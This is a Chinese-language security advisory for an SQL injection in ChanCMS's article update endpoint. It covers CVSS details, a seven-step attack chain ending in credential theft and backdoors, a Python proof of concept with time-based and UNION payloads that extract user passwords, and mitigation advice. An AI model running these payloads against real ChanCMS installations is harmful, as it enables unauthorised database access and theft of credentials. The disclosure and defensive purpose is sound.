CVE-2025-11903 ChanCMS update接口SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-11903

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

yanyutao0402 ChanCMS

漏洞概述

CVE-2025-11903是yanyutao0402 ChanCMS内容管理系统3.3.2及之前版本中存在的一个SQL注入安全漏洞。该漏洞位于/cms/article/update接口的update函数中，攻击者可以通过操纵传入的cid参数触发SQL注入攻击。由于该漏洞属于远程可利用类型，攻击者无需高权限即可通过网络发起攻击，仅需低权限（PR:L）即可完成利用，且不需要用户交互（UI:N）。

该漏洞的CVSS 3.1评分为6.3分，属于中危级别。其CVSS向量为CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L，表明漏洞利用复杂度低，对机密性、完整性和可用性均存在低程度的影响。攻击成功后，攻击者可以读取、修改或删除数据库中的敏感数据，甚至可能进一步获取系统控制权限。

根据披露信息，该漏洞的发现者通过VulDB平台提交了漏洞报告，并尝试联系了厂商（vendor），但厂商未对此做出任何回应。漏洞的利用代码已经在公开渠道发布，这意味着该漏洞存在被恶意利用的实际风险。受影响的用户应及时采取防护措施，避免遭受SQL注入攻击带来的数据泄露或篡改风险。

技术细节

ChanCMS的/cms/article/update接口中，update函数在处理客户端传入的cid参数时，未对该参数进行充分的输入验证和过滤，直接将用户可控的输入拼接到SQL查询语句中执行，从而导致SQL注入漏洞的产生。

从技术层面分析，该漏洞的利用过程如下：
1. 攻击者首先需要获取一个有效的低权限账号（如普通用户或编辑账号），因为漏洞利用需要低权限（PR:L）。
2. 攻击者构造包含恶意SQL片段的cid参数，例如通过UNION SELECT或基于布尔/时间的盲注payload。
3. 通过HTTP请求向/cms/article/update接口发送带有恶意cid参数的请求。
4. 服务器端未对cid参数进行参数化处理或转义，直接拼接到SQL语句中执行。
5. 攻击者通过注入的SQL语句实现对数据库的未授权访问、数据读取、数据修改甚至数据删除操作。

该漏洞的攻击复杂度为低（AC:L），攻击向量为网络（AV:N），不需要用户交互（UI:N），使得自动化的大规模扫描和利用成为可能。由于漏洞利用代码已经公开，攻击者可以方便地利用现成的工具或脚本对暴露在互联网上的ChanCMS实例发起攻击。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过搜索引擎或扫描工具识别互联网上暴露的ChanCMS实例，确认目标系统版本在3.3.2及以下。

STEP 2

步骤2：获取低权限凭证

攻击者通过注册、暴力破解或购买暗网凭证等方式获取一个有效的低权限账号（如普通编辑用户）。

STEP 3

步骤3：登录系统

使用获取的凭证登录ChanCMS管理后台，获取有效的会话Cookie。

STEP 4

步骤4：构造SQL注入Payload

针对/cms/article/update接口的cid参数，构造包含恶意SQL语句的注入payload，如UNION注入或时间盲注。

STEP 5

步骤5：发起注入攻击

通过认证后的会话向目标接口发送带有恶意cid参数的HTTP请求，触发服务器端SQL注入。

STEP 6

步骤6：数据提取与利用

利用SQL注入漏洞读取数据库中的敏感信息（如管理员密码哈希、用户数据），或修改/删除数据库内容。

STEP 7

步骤7：权限提升与持久化

利用获取的管理员凭证登录系统，获取更高权限，实现对系统的完全控制，并植入后门维持访问。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11903 ChanCMS SQL Injection PoC
# Vulnerability: SQL Injection via 'cid' parameter in /cms/article/update
# Affected: yanyutao0402 ChanCMS <= 3.3.2
# CVSS: 6.3 (MEDIUM)

import requests

TARGET_URL = "http://target.com"
LOGIN_URL = f"{TARGET_URL}/cms/login"
UPDATE_URL = f"{TARGET_URL}/cms/article/update"
USERNAME = "attacker_user"
PASSWORD = "attacker_pass"

# Step 1: Login with low-privilege credentials to obtain session cookie
session = requests.Session()
login_data = {
    "username": USERNAME,
    "password": PASSWORD
}
login_response = session.post(LOGIN_URL, data=login_data)
print(f"[*] Login Status: {login_response.status_code}")

# Step 2: Craft SQL injection payload in 'cid' parameter
# Using time-based blind injection to confirm vulnerability
sql_payload = "1' AND SLEEP(5)-- -"

# Step 3: Send malicious request to the vulnerable endpoint
update_data = {
    "cid": sql_payload,
    "title": "test",
    "content": "test"
}

print(f"[*] Sending SQLi payload: {sql_payload}")
response = session.post(UPDATE_URL, data=update_data)

# Step 4: Check response time to confirm SQL injection
elapsed_time = response.elapsed.total_seconds()
if elapsed_time >= 5:
    print(f"[+] SQL Injection confirmed! Response time: {elapsed_time}s")
else:
    print(f"[-] Response time: {elapsed_time}s - injection may have failed")

# Step 5: Extract data using UNION-based injection (example)
union_payload = "1' UNION SELECT 1,username,password,4,5 FROM cms_user-- -"
update_data["cid"] = union_payload
response = session.post(UPDATE_URL, data=update_data)
print(f"[*] Data extraction response: {response.text[:500]}")

影响范围

yanyutao0402 ChanCMS <= 3.3.2

防御指南

临时缓解措施

在厂商发布正式补丁之前，建议采取以下临时缓解措施：1）通过Web应用防火墙（WAF）规则拦截针对/cms/article/update接口的异常SQL注入请求；2）在反向代理层面限制对/cms/article/update接口的访问，仅允许可信IP访问；3）对数据库中存储的敏感信息进行加密，降低数据泄露风险；4）加强数据库账号权限管理，确保Web应用使用的数据库账号仅拥有最小必要权限；5）监控数据库日志，及时发现和阻断异常查询行为；6）定期备份数据库，以便在遭受攻击后快速恢复。